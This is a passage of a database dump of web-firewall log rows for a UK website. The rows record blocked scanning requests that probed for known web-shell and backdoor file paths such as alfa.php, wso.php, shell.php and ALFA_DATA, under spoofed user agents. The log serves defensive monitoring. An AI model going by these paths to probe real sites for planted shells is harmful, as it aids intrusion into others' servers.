User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11347,1673924266.931973,1673924266.817000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11348,1673924265.893955,1673924265.778900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11349,1673924264.608348,1673924264.496200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11350,1673924263.280075,1673924263.167500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/.well-known/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"Ly53ZWxsLWtub3duL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11351,1673924262.235231,1673924262.107400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11352,1673924261.174396,1673924261.059200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11353,1673924259.404017,1673924259.286800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11354,1673924257.667344,1673924257.560000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/error.php?phpshells=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Vycm9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11355,1673924256.620613,1673924256.511700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-backup-sql-302.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJhY2t1cC1zcWwtMzAyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11356,1673924255.546689,1673924255.422900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/system_log.php?bala=up','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N5c3RlbV9sb2cucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11357,1673924254.466032,1673924254.359000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/outcms.php?up=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvb3V0Y21zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11358,1673924250.385734,1673924250.276300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/db-cache.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvZGItY2FjaGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11359,1673924249.336213,1673924249.219700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/gank.php.PhP','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2dhbmsucGhwLlBoUA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11360,1673924247.437651,1673924247.323600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-plugins.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXBsdWdpbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11361,1673924245.334700,1673924245.212200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/legion.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2xlZ2lvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11362,1673924244.219612,1673924244.100200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11363,1673924243.689441,1673924243.572900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.bak.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5iYWsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11364,1673924240.953928,1673924240.836200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/mu-plugins/db-safe-mode.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy9kYi1zYWZlLW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11365,1673924239.880162,1673924239.768900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/backup_index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXBfaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11366,1673924238.811431,1673924238.693700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-booking.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWJvb2tpbmcucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11367,1673924232.481102,1673924232.354500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wp-class.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWNsYXNzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11368,1673924229.456200,1673924229.348800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/media-admin.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L21lZGlhLWFkbWluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11369,1673924228.406507,1673924228.300100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-signin.php?dizo=&ping=','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLXNpZ25pbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11370,1673924227.292045,1673924227.168800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/ups.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Vwcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11371,1673924223.736454,1673924223.624900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/doc.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2RvYy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11372,1673924222.687540,1673924222.578700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/radio.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3JhZGlvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11373,1673924220.534470,1673924220.418400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_ne.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11374,1673924219.447425,1673924219.329700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/s_e.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NfZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11375,1673924217.836251,1673924217.721200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11376,1673924217.327434,1673924217.214800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/style.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11377,1673924216.256766,1673924216.135000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11378,1673924214.065814,1673924213.929600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-load.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWxvYWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11379,1673924347.819550,1673924347.710700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shells.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxscy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11380,1673924347.316809,1673924347.208500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/about.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2Fib3V0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11381,1673924346.806103,1673924346.679700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/index.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9pbmRleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11382,1673924346.277571,1673924346.168500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/config.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2NvbmZpZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11383,1673924345.748237,1673924345.582200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/alfa.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FsZmEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11384,1673924345.164097,1673924345.036600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11385,1673924344.621970,1673924344.486600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/test.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3Rlc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11386,1673924344.091534,1673924343.980100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/a.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2EucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11387,1673924343.587033,1673924343.441300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/z.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3oucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11388,1673924343.047426,1673924342.934500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/x.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3gucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11389,1673924342.475658,1673924342.353700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/1.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"LzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11390,1673924341.946426,1673924341.825600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/upload.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11391,1673924341.431853,1673924341.312400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11392,1673924340.896285,1673924340.778100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/shell.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11393,1673924340.376580,1673924340.244500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11394,1673924339.299093,1673924339.164500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11395,1673924338.767661,1673924338.648300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11396,1673924338.242360,1673924338.105000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11397,1673924325.332318,1673924325.160700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11398,1673927456.653738,1673927456.526300,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11399,1673930981.865025,1673930981.738000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11400,1673930965.081069,1673930964.953500,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 